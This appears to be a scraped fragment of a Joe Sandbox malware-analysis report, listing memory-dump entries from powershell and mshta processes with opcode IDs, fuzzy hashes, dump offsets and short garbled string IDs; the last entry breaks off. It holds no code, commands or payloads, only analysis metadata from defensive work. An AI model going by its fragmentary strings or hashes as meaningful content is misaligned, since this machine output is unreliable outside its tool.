                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
Similarity
• API ID:
• String ID: ,SDj$_$p54i$RDj
• API String ID: 0-989244144
• Opcode ID: 4954a80c938c7e0b66845425d3449f8b555e8d5c8c17b1e7f1da150b22ef6998
• Instruction ID: a7c282877410610b4de23b3d8d8497dd78a65816cd715ceb5b6b2b86bed04334
• Opcode Fuzzy Hash: 4954a80c938c7e0b66845425d3449f8b555e8d5c8c17b1e7f1da150b22ef6998
• Instruction Fuzzy Hash: 68213DF59043069FEB10DE1CC900BAAFFE1EB95620F5981A6D45CA7292D735C981CB62
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q
• API String ID: 0-2049395529
• Opcode ID: 4eab53fc1bc309c4088538f70bf9b03359dbf8b1627ed1973c47ab9f8ebbd423
• Instruction ID: 2571223832e28ef7053a6d3f23b039373797411bb3f463f73649509f5d847427
• Opcode Fuzzy Hash: 4eab53fc1bc309c4088538f70bf9b03359dbf8b1627ed1973c47ab9f8ebbd423
• Instruction Fuzzy Hash: BD01846170A7D54FC72B16785924555AFB69F8391071A44DBC181CF29BCD154C8DC3B3
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
Similarity
• API ID:
• String ID: $^q$$^q$JEj$JEj
• API String ID: 0-3755646021
• Opcode ID: b2926473b3bf54394a0beec625d69b593d247e276c2925f5ba972def7afdfa9d
• Instruction ID: 5003b1472437f7b7c5fdac9747cd4ce3e693a85b3728c4616751b9736b7b33bf
• Opcode Fuzzy Hash: b2926473b3bf54394a0beec625d69b593d247e276c2925f5ba972def7afdfa9d
• Instruction Fuzzy Hash: 1F01DFB264A3C55FC72706688C10582BFB66F9361071A45E7D490CF26BC8299C99C3A3
Memory Dump Source
• Source File: 0000000F.00000003.2528875846.0000000005D10000.00000010.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_3_5d10000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
• Instruction ID: de6ccb8b1ce680ec410db4df3d88e5ec276d013ca6c215c65512ffc58eed4491
• Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
• Instruction Fuzzy Hash:
Strings
Memory Dump Source
• Source File: 00000046.00000002.2737955973.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7180000_powershell.jbxd
Similarity
• API ID:
• String ID: ek$ek
• API String ID: 0-3049552177
• Opcode ID: fb8b65de90132a7d8db2fd206919cff7324b35be2b6dd7b03d0955adc23d669d
• Instruction ID: 3c7f1fb9864b3daf72b3d351568656784603b25ede7834479f6ad445ae727c8e
• Opcode Fuzzy Hash: fb8b65de90132a7d8db2fd206919cff7324b35be2b6dd7b03d0955adc23d669d
• Instruction Fuzzy Hash: 20C15BB270424D9FCB55AB78994066BFBE79FC9310F24806AE505CB392DB36CC46CB61
Strings
Memory Dump Source
• Source File: 00000046.00000002.2737955973.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7180000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q
• API String ID: 0-2697143702
• Opcode ID: 87f57a1ffc37be518eac623d3efac41e8e853fb033c3d2c0fae0fcb44b799acf
• Instruction ID: b7802be263fd8ef05d0805aed413ea9140d271eee182508ecd36357cfcfa41d2
• Opcode Fuzzy Hash: 87f57a1ffc37be518eac623d3efac41e8e853fb033c3d2c0fae0fcb44b799acf
• Instruction Fuzzy Hash: C0C12BB1F0421A9FCB55AF79844066ABBA6EFCA310F14846AD545CF291DB31C889CFE1
Strings
Memory Dump Source
• Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
Similarity
• API ID:
• String ID: (bq$(bq
• API String ID: 0-4224401849
• Opcode ID: 5ee59744c643f2e3697477689f5885bf3ad9f3e9923d6382eaeff9c690fe2f11
• Instruction ID: 2e529430ecde28b9f0c2ec4e154f399ba20c041f84a279f889f941ed5b30a3d1
• Opcode Fuzzy Hash: 5ee59744c643f2e3697477689f5885bf3ad9f3e9923d6382eaeff9c690fe2f11
• Instruction Fuzzy Hash: 2E71C070A006199FCB14DFA9C85469EBBF6FF88310F108629D906BB350EB74AD85CB81
Strings
Memory Dump Source
• Source File: 00000046.00000002.2737955973.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7180000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q
• API String ID: 0-1614139903
• Opcode ID: f3e4ccf807e02fb52d5c22cb7097e3a52bc29925a87488672c709d996dd87220
• Instruction ID: 6784dcf562470ff9ed9c28936d776bc49fb8b70d69268d6e694843f64d4e6e6e
• Opcode Fuzzy Hash: f3e4ccf807e02fb52d5c22cb7097e3a52bc29925a87488672c709d996dd87220
• Instruction Fuzzy Hash: E82195F4B0520EDFCB95EF28C544BA6BBF1AF89364F258169D1088B591D731C988CFA1
Strings
Memory Dump Source
• Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
Similarity
• API ID:
• String ID: (bq
• API String ID: 0-149360118
• Opcode ID: 40673e3435e8d3c0a8831329cbbef77d6f7665a2646037109e3bf3d4db164ef6
• Instruction ID: 8473fa91555e9d281e6abc8203b4a491f47e64499486fc3ebc460c63696e750c
• Opcode Fuzzy Hash: 40673e3435e8d3c0a8831329cbbef77d6f7665a2646037109e3bf3d4db164ef6
• Instruction Fuzzy Hash: 5E01F17031A244DFD3056B799864A2E7BA6EFC3351B1484BAD502CB291DE349C02C766
Memory Dump Source
• Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6fc04097d274b798abdd4b66cd4154aba8cc625a5a9e56c30023b076664b183e
• Instruction ID: f633033352cfe245c391c174d770bfc0f06534ba652dc34b74afb54bced61f6f
• Opcode Fuzzy Hash: 6fc04097d274b798abdd4b66cd4154aba8cc625a5a9e56c30023b076664b183e
• Instruction Fuzzy Hash: 2FD118B4A01219DFDB14DF98D584A9DFBB2FF88314F248159E809AB365C731ED85CB90
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0e1324540655e4399fbeef5b8703b5c771c261a1bc1406e3b6f2a3c87a8bbf25
• Instruction ID: ee0b4769d9aa20b78b18d5cb08eda15b1e1b8d0f9ad29c148357658c01094d32
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e1324540655e4399fbeef5b8703b5c771c261a1bc1406e3b6f2a3c87a8bbf25
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE516F75A00609CFCB14DF69C984AAAFBF5FF88310B14C669D819DB355EB30E945CBA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 33cedd0f424eef36c9129baf207918cd4c89535c427af24298faea994bfe9d27
                                                                                                                                                                                                                                • Instruction ID: 2e09c3e2cac3ef147f46945f11e7b760ba330d691ffff25aa225d3a741fbd51d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33cedd0f424eef36c9129baf207918cd4c89535c427af24298faea994bfe9d27
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F419070300604AFE308EBA9D9D4B6AB7A3EF84314F508578951A9F3A5DF71FC498B90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d976b8057107c4ca041efdf05ce7fb168c3c55b92907ee86411766df5bd55a9c
                                                                                                                                                                                                                                • Instruction ID: c58ca3b51b146438ada0f34443d42c29ee93a63db747a7470caf08025b7e3ee6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d976b8057107c4ca041efdf05ce7fb168c3c55b92907ee86411766df5bd55a9c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96419F75A003099FDB10CF9AD884AEEBBF5FF88314F14846AE515AB350C735A941CB90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0e2caf4015b0464f08b71fa93f385c35833b2c24512b847548d973174e15c612
                                                                                                                                                                                                                                • Instruction ID: a903e79bad7018f12ddcf7b1ea2e3603e90cd699c76960e485fa105d70cbbdb8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e2caf4015b0464f08b71fa93f385c35833b2c24512b847548d973174e15c612
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D44105B4A009099FCB09CF59C5D49BAFBB1FF48310B1585A9D816AB368C736FD50CBA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 0012f5407e31036098bb2a1895851609c319dda0b84fcfb7afae2dabb3770d1a
                                                                                                                                                                                                                                • Instruction ID: f01c2d0b6dfb235d9a12fe0f4546d32d7b9c49b7154780e128d37effd6ac833a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0012f5407e31036098bb2a1895851609c319dda0b84fcfb7afae2dabb3770d1a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C41B070A0A3859FCB02DF1CC8A0999BFB0FF4A310B168496D484DB366D334EC95CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: da177f05cca241904583baddab934ae06ec3d775edd534e0fcd483337bfa55c7
                                                                                                                                                                                                                                • Instruction ID: 1a01b23ac9e2861748a3b3e5f1703ac34b485f800e7c5f96e93b6d6c02d8cd2b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da177f05cca241904583baddab934ae06ec3d775edd534e0fcd483337bfa55c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E41C2B1D00709DBDB20DFAAC984ADDFBB5BF48314F648019D409BB215E7756A4ACF90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: d9d589fb010905d787129c67247b9907775dd1e0fcb6cb2d0b02c9fa4866b230
                                                                                                                                                                                                                                • Instruction ID: b200d6be3edfd9f6b844f2c2c3640ade639c0fc303b2eb62528840ed16f57344
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9d589fb010905d787129c67247b9907775dd1e0fcb6cb2d0b02c9fa4866b230
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3313E74700600AFD754DF6ED890A77BBEAEBC8714B10856EE54DC7751EB70AC118BA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 9cf8d7e5ba0988dae8920f8d8d9165c71f4aedc42e3d361dc62aa0bef5b8728f
                                                                                                                                                                                                                                • Instruction ID: aef02dc8f265d1d8cc35e9061c479c38d02ebf66aa23f7910c356ad2ad5bf0fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cf8d7e5ba0988dae8920f8d8d9165c71f4aedc42e3d361dc62aa0bef5b8728f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E641A2B5D00709DBDB24DFAAC984ADDFBB5BF48314F248029D409BB214E7756A4ACF90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a1b519e1b447dfead9ffe029bdd632045082129a6821bd8821d8c100aa7fab37
                                                                                                                                                                                                                                • Instruction ID: e5adf7f9626922a9c3d841280459dbad09b50f67a6be4ebcb6071b10d32d7a94
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1b519e1b447dfead9ffe029bdd632045082129a6821bd8821d8c100aa7fab37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E31A274300600AFE315EBA5D4D4B6AB7A2EF85318F5084B8D51A9F766DF31FC498B90
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 40d3092908e7138863dbb29d32cee5587b7ae001ef937409e92117b4320dbdd2
                                                                                                                                                                                                                                • Instruction ID: 5a0ed289d590d681805fcae722facdc3f7bd3a25fdc8841503728198391a3f85
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40d3092908e7138863dbb29d32cee5587b7ae001ef937409e92117b4320dbdd2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC21E7716007048FD7109B79C9848AFBBF5EF81714B1189AAD556EB351EF70EC088BD1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 39b2ec44468dc3de10a0fb7583160dd1c937b33ac91947497b95a8b42b4358c8
                                                                                                                                                                                                                                • Instruction ID: 604c9c4466bc3225f787c67e832a77c8873524323ac8a58c9d177bf120a132b2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39b2ec44468dc3de10a0fb7583160dd1c937b33ac91947497b95a8b42b4358c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD2103B1D012199FCB10CF99D985ADEFBF8FB48310F14806AE908BB314D7749940CBA4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 6eb72cafcd4faad4e1e19fcb40942bd4c8762385d63137f4ccfc8e96e835f3db
                                                                                                                                                                                                                                • Instruction ID: b794449e1edf98084761b94efa4880c8f2daef9d88d116c691e9e4e7033e78ef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eb72cafcd4faad4e1e19fcb40942bd4c8762385d63137f4ccfc8e96e835f3db
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 492149B4A042199FCB04CF59D4909AABBF0FF89300B158496E819EB352C735FD42CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4028451a7533e13dccb68148a8341f9eb97bfcbe23dfa35e75279c8a9ebc1e5a
                                                                                                                                                                                                                                • Instruction ID: e9dc981dcaee9eb77b76b146cd92431348b29cdf62978a50e35e38cde9d05f14
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4028451a7533e13dccb68148a8341f9eb97bfcbe23dfa35e75279c8a9ebc1e5a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 171137B9E006099FCB04CF98D9809AEBBF1FF88310B158599E809AB351C731FD41CBA1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2701504962.000000000416D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0416D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_416d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                • Instruction ID: db7933e03bbed8593e8bfc2ee1e3ce3e8ba2eedb3f52b3968fbf3c3cc77830c0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9867b41209b1ae96989907f61c5f808f60e730aab7477091df5884716147213
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE11BB7A504384DFDB01CF14D5C4B15BBB1FB94318F28C6AADD0A4B652C33AE45ACBA2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2701504962.000000000416D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0416D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_416d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a0ef84d0e86284ca8fe4e39e7d44907599ab1e220d4927fdbf7f38b9e4985dc0
                                                                                                                                                                                                                                • Instruction ID: 445b529a9b2818094ff956b252d17bd05816016c6ebeeebeac93203af03c30cf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0ef84d0e86284ca8fe4e39e7d44907599ab1e220d4927fdbf7f38b9e4985dc0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9611607A504284DFDB12CF14D6C4B15BF71FB84324F24C6AAD8494B656C33AE45ACB51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7a855d7dfd456510b837a76f57f0929ea846a6564072ecb305a17ad065382c25
                                                                                                                                                                                                                                • Instruction ID: 257733059db0f3b4d56c183a04f373856e83552e55da50ac87b2fba73e1675c9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a855d7dfd456510b837a76f57f0929ea846a6564072ecb305a17ad065382c25
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF1132B59007488FCB20DF9AC988AEEBBF4EB48320F10841AD859A7210C374A940CFA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5695b481508a770c30cc14480556bd7693fb0cc79925edff2272e6bd7d2b7841
                                                                                                                                                                                                                                • Instruction ID: 95fa9e1a420d87cd243025707863306d9a55f9b4c6cc801581b7ecd9b50cea8a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5695b481508a770c30cc14480556bd7693fb0cc79925edff2272e6bd7d2b7841
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC1132B5900748CFCB20DF9AC988AEEBBF4EB48320F10841AD459A7210C374A940CFA0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
• Opcode ID: adf5649d554cf35877b63685d826f95e41e5186fca5968709b60bccd36ea7fdf
• Instruction ID: 4381e9a5cfffac5fb5cb2886fdd2d6c81ca2061d965c319582f82fb251eaf956
• Opcode Fuzzy Hash: adf5649d554cf35877b63685d826f95e41e5186fca5968709b60bccd36ea7fdf
• Instruction Fuzzy Hash: 371102B59007488FDB20DF9AD988BEEBBF4EB48320F14841AD559A7210D774A944CFA5
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd

Similarity
• API ID: (empty) • String ID: (empty) • API String ID: (empty)
• Opcode ID: 5c8c4d24718ce099237c011fcec70a7e2921766b0cde62939ccbc2566ac27fef
• Instruction ID: 5a7351e655d05021587b79b748de3423f6e88c5bf9f7766684ff58dc34da8089
• Opcode Fuzzy Hash: 5c8c4d24718ce099237c011fcec70a7e2921766b0cde62939ccbc2566ac27fef
• Instruction Fuzzy Hash: 181113B5900248CFDB20DF9AD588BDEBBF4EB48320F14845AD859A7210C774A945CFA5
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd

Similarity
• API ID: (empty) • String ID: (empty) • API String ID: (empty)
• Opcode ID: c1a8ba2fcee9b44e8a7d768f7365846429d07d698f51c24283bb517a3aac80cd
• Instruction ID: 86fed0296cedb55280c17109adaa352c8b9418317cdbe89579a3a221d180ab6f
• Opcode Fuzzy Hash: c1a8ba2fcee9b44e8a7d768f7365846429d07d698f51c24283bb517a3aac80cd
• Instruction Fuzzy Hash: 2B011779A00609DFDB10DFAAC4848DEBBF5EF4D320F258155E928A7361DB30A940DFA4
Memory Dump Source
• Source File: 00000046.00000002.2701504962.000000000416D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0416D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_416d000_powershell.jbxd

Similarity
• API ID: (empty) • String ID: (empty) • API String ID: (empty)
• Opcode ID: 4fda5b45951e00e10b0732b4d9dd4bd65140954d117c19e6517c35b33ff624ed
• Instruction ID: 0df155ae8ab08dd04176ccc45f33cd8309e1b98a9d7fc321ef7c2021c4efca89
• Opcode Fuzzy Hash: 4fda5b45951e00e10b0732b4d9dd4bd65140954d117c19e6517c35b33ff624ed
• Instruction Fuzzy Hash: C0012B312093409AE7244E25FDC4767BF98DF41324F18C46AEC0A0B146C779E845C6B1
Memory Dump Source
• Source File: 00000046.00000002.2701504962.000000000416D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0416D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_416d000_powershell.jbxd

Similarity
• API ID: (empty) • String ID: (empty) • API String ID: (empty)
• Opcode ID: 80c73fec29d2d3ac556010a6a0520254a0d48df3615c08815a7c49302dd7a8e0
• Instruction ID: febcfc2cb9d4893b680b794fdd49e983a6f5cfabc8b269b102feb5ca615d7390
• Opcode Fuzzy Hash: 80c73fec29d2d3ac556010a6a0520254a0d48df3615c08815a7c49302dd7a8e0
• Instruction Fuzzy Hash: 8B015E6110E3C09FD7128B259C94B52BFB4EF53224F1DC1CBD8888F1A3C2699849C772
Memory Dump Source
• Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd

Similarity
• API ID: (empty) • String ID: (empty) • API String ID: (empty)
• Opcode ID: 65860c9e54740533579cd0f849482f6e8c122604a72fa70e45d75bf8528d2940
